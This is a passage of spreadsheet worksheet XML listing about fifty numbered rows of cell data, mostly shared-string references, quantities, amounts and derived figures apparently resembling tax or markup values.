        <v>6201</v>
      </c>
      <c r="F591" s="9"/>
      <c r="G591" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H591" s="10">
        <v>6</v>
      </c>
      <c r="I591" s="14">
        <v>1264.96</v>
      </c>
      <c r="J591" s="15">
        <v>202.3968</v>
      </c>
      <c r="K591" s="16"/>
    </row>
    <row r="592" spans="2:11">
      <c r="B592" s="9">
        <v>619</v>
      </c>
      <c r="C592" s="238" t="s">
        <v>6202</v>
      </c>
      <c r="D592" s="238" t="s">
        <v>6203</v>
      </c>
      <c r="E592" s="238" t="s">
        <v>6204</v>
      </c>
      <c r="F592" s="238" t="s">
        <v>6205</v>
      </c>
      <c r="G592" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H592" s="10">
        <v>2</v>
      </c>
      <c r="I592" s="14">
        <v>307.69</v>
      </c>
      <c r="J592" s="15">
        <v>49.232</v>
      </c>
      <c r="K592" s="16"/>
    </row>
    <row r="593" spans="2:11">
      <c r="B593" s="9">
        <v>620</v>
      </c>
      <c r="C593" s="238" t="s">
        <v>6206</v>
      </c>
      <c r="D593" s="9"/>
      <c r="E593" s="238" t="s">
        <v>6207</v>
      </c>
      <c r="F593" s="238" t="s">
        <v>6208</v>
      </c>
      <c r="G593" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H593" s="10">
        <v>16</v>
      </c>
      <c r="I593" s="14">
        <v>5333.35</v>
      </c>
      <c r="J593" s="15">
        <v>853.3248</v>
      </c>
      <c r="K593" s="16"/>
    </row>
    <row r="594" spans="2:11">
      <c r="B594" s="9">
        <v>621</v>
      </c>
      <c r="C594" s="238" t="s">
        <v>6209</v>
      </c>
      <c r="D594" s="238" t="s">
        <v>6210</v>
      </c>
      <c r="E594" s="238" t="s">
        <v>6211</v>
      </c>
      <c r="F594" s="238" t="s">
        <v>6212</v>
      </c>
      <c r="G594" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H594" s="10">
        <v>20</v>
      </c>
      <c r="I594" s="14">
        <v>2632.5</v>
      </c>
      <c r="J594" s="15">
        <v>421.216</v>
      </c>
      <c r="K594" s="16"/>
    </row>
    <row r="595" spans="2:11">
      <c r="B595" s="9">
        <v>622</v>
      </c>
      <c r="C595" s="238" t="s">
        <v>6213</v>
      </c>
      <c r="D595" s="238" t="s">
        <v>6135</v>
      </c>
      <c r="E595" s="238" t="s">
        <v>6136</v>
      </c>
      <c r="F595" s="238" t="s">
        <v>6214</v>
      </c>
      <c r="G595" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H595" s="10">
        <v>24</v>
      </c>
      <c r="I595" s="14">
        <v>1760.68</v>
      </c>
      <c r="J595" s="15">
        <v>281.7024</v>
      </c>
      <c r="K595" s="16"/>
    </row>
    <row r="596" spans="2:11">
      <c r="B596" s="9">
        <v>623</v>
      </c>
      <c r="C596" s="238" t="s">
        <v>6215</v>
      </c>
      <c r="D596" s="9"/>
      <c r="E596" s="238" t="s">
        <v>6216</v>
      </c>
      <c r="F596" s="238" t="s">
        <v>6217</v>
      </c>
      <c r="G596" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H596" s="10">
        <v>2</v>
      </c>
      <c r="I596" s="14">
        <v>1025.64</v>
      </c>
      <c r="J596" s="15">
        <v>164.1024</v>
      </c>
      <c r="K596" s="16"/>
    </row>
    <row r="597" spans="2:11">
      <c r="B597" s="9">
        <v>624</v>
      </c>
      <c r="C597" s="238" t="s">
        <v>6218</v>
      </c>
      <c r="D597" s="9"/>
      <c r="E597" s="238" t="s">
        <v>6219</v>
      </c>
      <c r="F597" s="9"/>
      <c r="G597" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H597" s="10">
        <v>6</v>
      </c>
      <c r="I597" s="14">
        <v>4871.8</v>
      </c>
      <c r="J597" s="15">
        <v>779.4912</v>
      </c>
      <c r="K597" s="16"/>
    </row>
    <row r="598" spans="2:11">
      <c r="B598" s="9">
        <v>625</v>
      </c>
      <c r="C598" s="238" t="s">
        <v>6220</v>
      </c>
      <c r="D598" s="9"/>
      <c r="E598" s="238" t="s">
        <v>6221</v>
      </c>
      <c r="F598" s="9"/>
      <c r="G598" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H598" s="10">
        <v>3</v>
      </c>
      <c r="I598" s="14">
        <v>47.45</v>
      </c>
      <c r="J598" s="15">
        <v>7.5936</v>
      </c>
      <c r="K598" s="16"/>
    </row>
    <row r="599" spans="2:11">
      <c r="B599" s="9">
        <v>626</v>
      </c>
      <c r="C599" s="238" t="s">
        <v>6222</v>
      </c>
      <c r="D599" s="238" t="s">
        <v>6223</v>
      </c>
      <c r="E599" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F599" s="238" t="s">
        <v>6225</v>
      </c>
      <c r="G599" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H599" s="10">
        <v>5</v>
      </c>
      <c r="I599" s="14">
        <v>4700.85</v>
      </c>
      <c r="J599" s="15">
        <v>752.136</v>
      </c>
      <c r="K599" s="16"/>
    </row>
    <row r="600" spans="2:11">
      <c r="B600" s="9">
        <v>627</v>
      </c>
      <c r="C600" s="238" t="s">
        <v>6226</v>
      </c>
      <c r="D600" s="9"/>
      <c r="E600" s="238" t="s">
        <v>6227</v>
      </c>
      <c r="F600" s="238" t="s">
        <v>6228</v>
      </c>
      <c r="G600" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H600" s="10">
        <v>9</v>
      </c>
      <c r="I600" s="14">
        <v>2692.29</v>
      </c>
      <c r="J600" s="15">
        <v>430.7616</v>
      </c>
      <c r="K600" s="16"/>
    </row>
    <row r="601" spans="2:11">
      <c r="B601" s="9">
        <v>628</v>
      </c>
      <c r="C601" s="238" t="s">
        <v>6229</v>
      </c>
      <c r="D601" s="9"/>
      <c r="E601" s="238" t="s">
        <v>6230</v>
      </c>
      <c r="F601" s="9"/>
      <c r="G601" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H601" s="10">
        <v>8</v>
      </c>
      <c r="I601" s="14">
        <v>4102.57</v>
      </c>
      <c r="J601" s="15">
        <v>656.4096</v>
      </c>
      <c r="K601" s="16"/>
    </row>
    <row r="602" spans="2:11">
      <c r="B602" s="9">
        <v>629</v>
      </c>
      <c r="C602" s="238" t="s">
        <v>6231</v>
      </c>
      <c r="D602" s="9"/>
      <c r="E602" s="238" t="s">
        <v>6085</v>
      </c>
      <c r="F602" s="238" t="s">
        <v>6232</v>
      </c>
      <c r="G602" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H602" s="10">
        <v>2</v>
      </c>
      <c r="I602" s="14">
        <v>205.13</v>
      </c>
      <c r="J602" s="15">
        <v>32.8224</v>
      </c>
      <c r="K602" s="16"/>
    </row>
    <row r="603" spans="2:11">
      <c r="B603" s="9">
        <v>630</v>
      </c>
      <c r="C603" s="238" t="s">
        <v>6233</v>
      </c>
      <c r="D603" s="9"/>
      <c r="E603" s="238" t="s">
        <v>6234</v>
      </c>
      <c r="F603" s="238" t="s">
        <v>6235</v>
      </c>
      <c r="G603" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H603" s="10">
        <v>3</v>
      </c>
      <c r="I603" s="14">
        <v>168.28</v>
      </c>
      <c r="J603" s="15">
        <v>26.9232</v>
      </c>
      <c r="K603" s="16"/>
    </row>
    <row r="604" spans="2:11">
      <c r="B604" s="9">
        <v>631</v>
      </c>
      <c r="C604" s="238" t="s">
        <v>6236</v>
      </c>
      <c r="D604" s="9"/>
      <c r="E604" s="238" t="s">
        <v>6234</v>
      </c>
      <c r="F604" s="238" t="s">
        <v>6237</v>
      </c>
      <c r="G604" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H604" s="10">
        <v>15</v>
      </c>
      <c r="I604" s="14">
        <v>1047.01</v>
      </c>
      <c r="J604" s="15">
        <v>167.52</v>
      </c>
      <c r="K604" s="16"/>
    </row>
    <row r="605" spans="2:11">
      <c r="B605" s="9">
        <v>632</v>
      </c>
      <c r="C605" s="238" t="s">
        <v>6238</v>
      </c>
      <c r="D605" s="238" t="s">
        <v>6239</v>
      </c>
      <c r="E605" s="238" t="s">
        <v>6240</v>
      </c>
      <c r="F605" s="238" t="s">
        <v>6241</v>
      </c>
      <c r="G605" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H605" s="10">
        <v>1</v>
      </c>
      <c r="I605" s="14">
        <v>1709.4</v>
      </c>
      <c r="J605" s="15">
        <v>273.504</v>
      </c>
      <c r="K605" s="16"/>
    </row>
    <row r="606" spans="2:11">
      <c r="B606" s="9">
        <v>633</v>
      </c>
      <c r="C606" s="238" t="s">
        <v>6242</v>
      </c>
      <c r="D606" s="238" t="s">
        <v>6243</v>
      </c>
      <c r="E606" s="238" t="s">
        <v>6244</v>
      </c>
      <c r="F606" s="9"/>
      <c r="G606" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H606" s="10">
        <v>2</v>
      </c>
      <c r="I606" s="14">
        <v>400</v>
      </c>
      <c r="J606" s="15">
        <v>64</v>
      </c>
      <c r="K606" s="16"/>
    </row>
    <row r="607" spans="2:11">
      <c r="B607" s="9">
        <v>634</v>
      </c>
      <c r="C607" s="238" t="s">
        <v>6245</v>
      </c>
      <c r="D607" s="238" t="s">
        <v>6246</v>
      </c>
      <c r="E607" s="238" t="s">
        <v>6247</v>
      </c>
      <c r="F607" s="9"/>
      <c r="G607" s="237" t="s">
        <v>6248</v>
      </c>
      <c r="H607" s="10">
        <v>1</v>
      </c>
      <c r="I607" s="14">
        <v>196.58</v>
      </c>
      <c r="J607" s="15">
        <v>31.4528</v>
      </c>
      <c r="K607" s="16"/>
    </row>
    <row r="608" spans="2:11">
      <c r="B608" s="9">
        <v>635</v>
      </c>
      <c r="C608" s="238" t="s">
        <v>6249</v>
      </c>
      <c r="D608" s="238" t="s">
        <v>6250</v>
      </c>
      <c r="E608" s="238" t="s">
        <v>6251</v>
      </c>
      <c r="F608" s="238" t="s">
        <v>6252</v>
      </c>
      <c r="G608" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H608" s="10">
        <v>1</v>
      </c>
      <c r="I608" s="14">
        <v>778.63</v>
      </c>
      <c r="J608" s="15">
        <v>124.5808</v>
      </c>
      <c r="K608" s="16"/>
    </row>
    <row r="609" spans="2:11">
      <c r="B609" s="9">
        <v>636</v>
      </c>
      <c r="C609" s="238" t="s">
        <v>6253</v>
      </c>
      <c r="D609" s="238" t="s">
        <v>6254</v>
      </c>
      <c r="E609" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F609" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G609" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H609" s="10">
        <v>92</v>
      </c>
      <c r="I609" s="14">
        <v>677.96</v>
      </c>
      <c r="J609" s="15">
        <v>271.216</v>
      </c>
      <c r="K609" s="16"/>
    </row>
    <row r="610" spans="2:11">
      <c r="B610" s="9">
        <v>637</v>
      </c>
      <c r="C610" s="238" t="s">
        <v>6257</v>
      </c>
      <c r="D610" s="238" t="s">
        <v>6258</v>
      </c>
      <c r="E610" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F610" s="238" t="s">
        <v>6259</v>
      </c>
      <c r="G610" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H610" s="10">
        <v>40</v>
      </c>
      <c r="I610" s="14">
        <v>940.19</v>
      </c>
      <c r="J610" s="15">
        <v>376</v>
      </c>
      <c r="K610" s="16"/>
    </row>
    <row r="611" spans="2:11">
      <c r="B611" s="9">
        <v>638</v>
      </c>
      <c r="C611" s="238" t="s">
        <v>6260</v>
      </c>
      <c r="D611" s="238" t="s">
        <v>6261</v>
      </c>
      <c r="E611" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F611" s="238" t="s">
        <v>6262</v>
      </c>
      <c r="G611" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H611" s="10">
        <v>5</v>
      </c>
      <c r="I611" s="14">
        <v>311.97</v>
      </c>
      <c r="J611" s="15">
        <v>124.78</v>
      </c>
      <c r="K611" s="16"/>
    </row>
    <row r="612" spans="2:11">
      <c r="B612" s="9">
        <v>639</v>
      </c>
      <c r="C612" s="238" t="s">
        <v>6263</v>
      </c>
      <c r="D612" s="238" t="s">
        <v>6264</v>
      </c>
      <c r="E612" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F612" s="238" t="s">
        <v>6265</v>
      </c>
      <c r="G612" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H612" s="10">
        <v>14</v>
      </c>
      <c r="I612" s="14">
        <v>708.18</v>
      </c>
      <c r="J612" s="15">
        <v>283.248</v>
      </c>
      <c r="K612" s="16"/>
    </row>
    <row r="613" spans="2:11">
      <c r="B613" s="9">
        <v>640</v>
      </c>
      <c r="C613" s="238" t="s">
        <v>6266</v>
      </c>
      <c r="D613" s="238" t="s">
        <v>6267</v>
      </c>
      <c r="E613" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F613" s="238" t="s">
        <v>6268</v>
      </c>
      <c r="G613" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H613" s="10">
        <v>3</v>
      </c>
      <c r="I613" s="14">
        <v>211.91</v>
      </c>
      <c r="J613" s="15">
        <v>84.768</v>
      </c>
      <c r="K613" s="16"/>
    </row>
    <row r="614" spans="2:11">
      <c r="B614" s="9">
        <v>641</v>
      </c>
      <c r="C614" s="238" t="s">
        <v>6269</v>
      </c>
      <c r="D614" s="238" t="s">
        <v>6254</v>
      </c>
      <c r="E614" s="238" t="s">
        <v>6270</v>
      </c>
      <c r="F614" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G614" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H614" s="10">
        <v>33</v>
      </c>
      <c r="I614" s="14">
        <v>318.7</v>
      </c>
      <c r="J614" s="15">
        <v>127.512</v>
      </c>
      <c r="K614" s="16"/>
    </row>
    <row r="615" spans="2:11">
      <c r="B615" s="9">
        <v>642</v>
      </c>
      <c r="C615" s="238" t="s">
        <v>6271</v>
      </c>
      <c r="D615" s="238" t="s">
        <v>6272</v>
      </c>
      <c r="E615" s="238" t="s">
        <v>6255</v>
      </c>
      <c r="F615" s="238" t="s">
        <v>6273</v>
      </c>
      <c r="G615" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H615" s="10">
        <v>2</v>
      </c>
      <c r="I615" s="14">
        <v>74.86</v>
      </c>
      <c r="J615" s="15">
        <v>29.944</v>
      </c>
      <c r="K615" s="16"/>
    </row>
    <row r="616" spans="2:11">
      <c r="B616" s="9">
        <v>643</v>
      </c>
      <c r="C616" s="238" t="s">
        <v>6274</v>
      </c>
      <c r="D616" s="238" t="s">
        <v>6275</v>
      </c>
      <c r="E616" s="238" t="s">
        <v>6270</v>
      </c>
      <c r="F616" s="238" t="s">
        <v>6276</v>
      </c>
      <c r="G616" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H616" s="10">
        <v>23</v>
      </c>
      <c r="I616" s="14">
        <v>408.74</v>
      </c>
      <c r="J616" s="15">
        <v>163.484</v>
      </c>
      <c r="K616" s="16"/>
    </row>
    <row r="617" spans="2:11">
      <c r="B617" s="9">
        <v>644</v>
      </c>
      <c r="C617" s="238" t="s">
        <v>6277</v>
      </c>
      <c r="D617" s="238" t="s">
        <v>6258</v>
      </c>
      <c r="E617" s="238" t="s">
        <v>6270</v>
      </c>
      <c r="F617" s="238" t="s">
        <v>6259</v>
      </c>
      <c r="G617" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H617" s="10">
        <v>16</v>
      </c>
      <c r="I617" s="14">
        <v>410.29</v>
      </c>
      <c r="J617" s="15">
        <v>164.096</v>
      </c>
      <c r="K617" s="16"/>
    </row>
    <row r="618" spans="2:11">
      <c r="B618" s="9">
        <v>645</v>
      </c>
      <c r="C618" s="238" t="s">
        <v>6278</v>
      </c>
      <c r="D618" s="238" t="s">
        <v>6272</v>
      </c>
      <c r="E618" s="238" t="s">
        <v>6270</v>
      </c>
      <c r="F618" s="238" t="s">
        <v>6279</v>
      </c>
      <c r="G618" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H618" s="10">
        <v>43</v>
      </c>
      <c r="I618" s="14">
        <v>15446.82</v>
      </c>
      <c r="J618" s="15">
        <v>6178.756</v>
      </c>
      <c r="K618" s="16"/>
    </row>
    <row r="619" spans="2:11">
      <c r="B619" s="9">
        <v>646</v>
      </c>
      <c r="C619" s="238" t="s">
        <v>6280</v>
      </c>
      <c r="D619" s="238" t="s">
        <v>6281</v>
      </c>
      <c r="E619" s="238" t="s">
        <v>6282</v>
      </c>
      <c r="F619" s="238" t="s">
        <v>3852</v>
      </c>
      <c r="G619" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H619" s="10">
        <v>12</v>
      </c>
      <c r="I619" s="14">
        <v>98.46</v>
      </c>
      <c r="J619" s="15">
        <v>39.408</v>
      </c>
      <c r="K619" s="16"/>
    </row>
    <row r="620" spans="2:11">
      <c r="B620" s="9">
        <v>647</v>
      </c>
      <c r="C620" s="238" t="s">
        <v>6283</v>
      </c>
      <c r="D620" s="238" t="s">
        <v>6284</v>
      </c>
      <c r="E620" s="238" t="s">
        <v>6282</v>
      </c>
      <c r="F620" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G620" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H620" s="10">
        <v>12</v>
      </c>
      <c r="I620" s="14">
        <v>35.9</v>
      </c>
      <c r="J620" s="15">
        <v>14.352</v>
      </c>
      <c r="K620" s="16"/>
    </row>
    <row r="621" spans="2:11">
      <c r="B621" s="9">
        <v>648</v>
      </c>
      <c r="C621" s="238" t="s">
        <v>6285</v>
      </c>
      <c r="D621" s="238" t="s">
        <v>6286</v>
      </c>
      <c r="E621" s="238" t="s">
        <v>6282</v>
      </c>
      <c r="F621" s="238" t="s">
        <v>6265</v>
      </c>
      <c r="G621" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H621" s="10">
        <v>8</v>
      </c>
      <c r="I621" s="14">
        <v>138.07</v>
      </c>
      <c r="J621" s="15">
        <v>55.232</v>
      </c>
      <c r="K621" s="16"/>
    </row>
    <row r="622" spans="2:11">
      <c r="B622" s="9">
        <v>649</v>
      </c>
      <c r="C622" s="238" t="s">
        <v>6287</v>
      </c>
      <c r="D622" s="238" t="s">
        <v>6288</v>
      </c>
      <c r="E622" s="238" t="s">
        <v>6282</v>
      </c>
      <c r="F622" s="238" t="s">
        <v>6279</v>
      </c>
      <c r="G622" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H622" s="10">
        <v>3</v>
      </c>
      <c r="I622" s="14">
        <v>122.98</v>
      </c>
      <c r="J622" s="15">
        <v>49.188</v>
      </c>
      <c r="K622" s="16"/>
    </row>
    <row r="623" spans="2:11">
      <c r="B623" s="9">
        <v>650</v>
      </c>
      <c r="C623" s="238" t="s">
        <v>6289</v>
      </c>
      <c r="D623" s="238" t="s">
        <v>6286</v>
      </c>
      <c r="E623" s="238" t="s">
        <v>6282</v>
      </c>
      <c r="F623" s="238" t="s">
        <v>6268</v>
      </c>
      <c r="G623" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H623" s="10">
        <v>8</v>
      </c>
      <c r="I623" s="14">
        <v>492.27</v>
      </c>
      <c r="J623" s="15">
        <v>196.896</v>
      </c>
      <c r="K623" s="16"/>
    </row>
    <row r="624" spans="2:11">
      <c r="B624" s="9">
        <v>651</v>
      </c>
      <c r="C624" s="238" t="s">
        <v>6290</v>
      </c>
      <c r="D624" s="238" t="s">
        <v>6291</v>
      </c>
      <c r="E624" s="238" t="s">
        <v>6292</v>
      </c>
      <c r="F624" s="238" t="s">
        <v>6293</v>
      </c>
      <c r="G624" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H624" s="10">
        <v>14</v>
      </c>
      <c r="I624" s="14">
        <v>122.99</v>
      </c>
      <c r="J624" s="15">
        <v>49.224</v>
      </c>
      <c r="K624" s="16"/>
    </row>
    <row r="625" spans="2:11">
      <c r="B625" s="9">
        <v>652</v>
      </c>
      <c r="C625" s="238" t="s">
        <v>6294</v>
      </c>
      <c r="D625" s="238" t="s">
        <v>6295</v>
      </c>
      <c r="E625" s="238" t="s">
        <v>6296</v>
      </c>
      <c r="F625" s="238" t="s">
        <v>6297</v>
      </c>
      <c r="G625" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H625" s="10">
        <v>70</v>
      </c>
      <c r="I625" s="14">
        <v>1502.76</v>
      </c>
      <c r="J625" s="15">
        <v>601.16</v>
      </c>
      <c r="K625" s="16"/>
    </row>
    <row r="626" spans="2:11">
      <c r="B626" s="9">
        <v>653</v>
      </c>
      <c r="C626" s="238" t="s">
        <v>6298</v>
      </c>
      <c r="D626" s="238" t="s">
        <v>6295</v>
      </c>
      <c r="E626" s="238" t="s">
        <v>6296</v>
      </c>
      <c r="F626" s="238" t="s">
        <v>6299</v>
      </c>
      <c r="G626" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H626" s="10">
        <v>20</v>
      </c>
      <c r="I626" s="14">
        <v>42.74</v>
      </c>
      <c r="J626" s="15">
        <v>17.12</v>
      </c>
      <c r="K626" s="16"/>
    </row>
    <row r="627" spans="2:11">
      <c r="B627" s="9">
        <v>654</v>
      </c>
      <c r="C627" s="238" t="s">
        <v>6300</v>
      </c>
      <c r="D627" s="238" t="s">
        <v>6301</v>
      </c>
      <c r="E627" s="238" t="s">
        <v>6302</v>
      </c>
      <c r="F627" s="238" t="s">
        <v>6303</v>
      </c>
      <c r="G627" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H627" s="10">
        <v>20</v>
      </c>
      <c r="I627" s="14">
        <v>49.93</v>
      </c>
      <c r="J627" s="15">
        <v>20</v>
      </c>
      <c r="K627" s="16"/>
    </row>
    <row r="628" spans="2:11">
      <c r="B628" s="9">
        <v>655</v>
      </c>
      <c r="C628" s="238" t="s">
        <v>6304</v>
      </c>
      <c r="D628" s="238" t="s">
        <v>6291</v>
      </c>
      <c r="E628" s="238" t="s">
        <v>6292</v>
      </c>
      <c r="F628" s="238" t="s">
        <v>6305</v>
      </c>
      <c r="G628" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H628" s="10">
        <v>8</v>
      </c>
      <c r="I628" s="14">
        <v>23.93</v>
      </c>
      <c r="J628" s="15">
        <v>9.568</v>
      </c>
      <c r="K628" s="16"/>
    </row>
    <row r="629" spans="2:11">
      <c r="B629" s="9">
        <v>656</v>
      </c>
      <c r="C629" s="238" t="s">
        <v>6306</v>
      </c>
      <c r="D629" s="238" t="s">
        <v>6307</v>
      </c>
      <c r="E629" s="238" t="s">
        <v>6308</v>
      </c>
      <c r="F629" s="238" t="s">
        <v>6299</v>
      </c>
      <c r="G629" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H629" s="10">
        <v>261</v>
      </c>
      <c r="I629" s="14">
        <v>5907.03</v>
      </c>
      <c r="J629" s="15">
        <v>2362.572</v>
      </c>
      <c r="K629" s="16"/>
    </row>
    <row r="630" spans="2:11">
      <c r="B630" s="9">
        <v>657</v>
      </c>
      <c r="C630" s="238" t="s">
        <v>6309</v>
      </c>
      <c r="D630" s="238" t="s">
        <v>6310</v>
      </c>
      <c r="E630" s="238" t="s">
        <v>6311</v>
      </c>
      <c r="F630" s="238" t="s">
        <v>6312</v>
      </c>
      <c r="G630" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H630" s="10">
        <v>64</v>
      </c>
      <c r="I630" s="14">
        <v>35.31</v>
      </c>
      <c r="J630" s="15">
        <v>14.08</v>
      </c>
      <c r="K630" s="16"/>
    </row>
    <row r="631" spans="2:11">
      <c r="B631" s="9">
        <v>658</v>
      </c>
      <c r="C631" s="238" t="s">
        <v>6313</v>
      </c>
      <c r="D631" s="238" t="s">
        <v>6314</v>
      </c>
      <c r="E631" s="238" t="s">
        <v>6315</v>
      </c>
      <c r="F631" s="238" t="s">
        <v>6316</v>
      </c>
      <c r="G631" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H631" s="10">
        <v>2</v>
      </c>
      <c r="I631" s="14">
        <v>93.48</v>
      </c>
      <c r="J631" s="15">
        <v>14.9568</v>
      </c>
      <c r="K631" s="16"/>
    </row>
    <row r="632" spans="2:11">
      <c r="B632" s="9">
        <v>659</v>
      </c>
      <c r="C632" s="238" t="s">
        <v>6317</v>
      </c>
      <c r="D632" s="238" t="s">
        <v>6318</v>
      </c>
      <c r="E632" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F632" s="238" t="s">
        <v>6320</v>
      </c>
      <c r="G632" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H632" s="10">
        <v>4</v>
      </c>
      <c r="I632" s="14">
        <v>64.93</v>
      </c>
      <c r="J632" s="15">
        <v>10.3872</v>
      </c>
      <c r="K632" s="16"/>
    </row>
    <row r="633" spans="2:11">
      <c r="B633" s="9">
        <v>660</v>
      </c>
      <c r="C633" s="238" t="s">
        <v>6321</v>
      </c>
      <c r="D633" s="238" t="s">
        <v>6322</v>
      </c>
      <c r="E633" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F633" s="238" t="s">
        <v>6323</v>
      </c>
      <c r="G633" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H633" s="10">
        <v>2</v>
      </c>
      <c r="I633" s="14">
        <v>11.11</v>
      </c>
      <c r="J633" s="15">
        <v>1.7792</v>
      </c>
      <c r="K633" s="16"/>
    </row>
    <row r="634" spans="2:11">
      <c r="B634" s="9">
        <v>661</v>
      </c>
      <c r="C634" s="238" t="s">
        <v>6324</v>
      </c>
      <c r="D634" s="238" t="s">
        <v>6325</v>
      </c>
      <c r="E634" s="238" t="s">
        <v>6326</v>
      </c>
      <c r="F634" s="238" t="s">
        <v>6327</v>
      </c>
      <c r="G634" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H634" s="10">
        <v>5</v>
      </c>
      <c r="I634" s="14">
        <v>123.93</v>
      </c>
      <c r="J634" s="15">
        <v>19.832</v>
      </c>
      <c r="K634" s="16"/>
    </row>
    <row r="635" spans="2:11">
      <c r="B635" s="9">
        <v>662</v>
      </c>
      <c r="C635" s="238" t="s">
        <v>6328</v>
      </c>
      <c r="D635" s="238" t="s">
        <v>6329</v>
      </c>
      <c r="E635" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F635" s="238" t="s">
        <v>6330</v>
      </c>
      <c r="G635" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H635" s="10">
        <v>1</v>
      </c>
      <c r="I635" s="14">
        <v>66.88</v>
      </c>
      <c r="J635" s="15">
        <v>10.7008</v>
      </c>
      <c r="K635" s="16"/>
    </row>
    <row r="636" spans="2:11">
      <c r="B636" s="9">
        <v>663</v>
      </c>
      <c r="C636" s="238" t="s">
        <v>6331</v>
      </c>
      <c r="D636" s="238" t="s">
        <v>6332</v>
      </c>
      <c r="E636" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F636" s="238" t="s">
        <v>6333</v>
      </c>
      <c r="G636" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H636" s="10">
        <v>2</v>
      </c>
      <c r="I636" s="14">
        <v>1181.53</v>
      </c>
      <c r="J636" s="15">
        <v>189.0464</v>
      </c>
      <c r="K636" s="16"/>
    </row>
    <row r="637" spans="2:11">
      <c r="B637" s="9">
        <v>664</v>
      </c>
      <c r="C637" s="238" t="s">
        <v>6334</v>
      </c>
      <c r="D637" s="238" t="s">
        <v>6335</v>
      </c>
      <c r="E637" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F637" s="238" t="s">
        <v>6336</v>
      </c>
      <c r="G637" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H637" s="10">
        <v>1</v>
      </c>
      <c r="I637" s="14">
        <v>403.42</v>
      </c>
      <c r="J637" s="15">
        <v>64.5472</v>
      </c>
      <c r="K637" s="16"/>
    </row>
    <row r="638" spans="2:11">
      <c r="B638" s="9">
        <v>665</v>
      </c>
      <c r="C638" s="238" t="s">
        <v>6337</v>
      </c>
      <c r="D638" s="238" t="s">
        <v>6332</v>
      </c>
      <c r="E638" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F638" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G638" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H638" s="10">
        <v>1</v>
      </c>
      <c r="I638" s="14">
        <v>44.62</v>
      </c>
      <c r="J638" s="15">
        <v>7.1392</v>
      </c>
      <c r="K638" s="16"/>
    </row>
    <row r="639" spans="2:11">
      <c r="B639" s="9">
        <v>666</v>
      </c>
      <c r="C639" s="238" t="s">
        <v>6338</v>
      </c>
      <c r="D639" s="238" t="s">
        <v>6339</v>
      </c>
      <c r="E639" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F639" s="238" t="s">
        <v>6340</v>
      </c>
      <c r="G639" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H639" s="10">
        <v>1</v>
      </c>
      <c r="I639" s="14">
        <v>247.86</v>
      </c>
      <c r="J639" s="15">
        <v>39.6576</v>
      </c>
      <c r="K639" s="16"/>
    </row>
    <row r="640" spans="2:11">
      <c r="B640" s="9">
        <v>667</v>
      </c>
      <c r="C640" s="238" t="s">
        <v>6341</v>
      </c>
      <c r="D640" s="238" t="s">
        <v>6342</v>
      </c>
      <c r="E640" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F640" s="238" t="s">
        <v>6343</v>
      </c>
      <c r="G640" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H640" s="10">
        <v>2</v>
      </c>
      <c r="I640" s="14">
        <v>430.86</v>
      </c>
      <c r="J640" s="15">
        <v>68.9376</v>
      </c>
      <c r="K640" s="16"/>
    </row>
    <row r="641" spans="2:11">
      <c r="B641" s="9">
        <v>668</v>
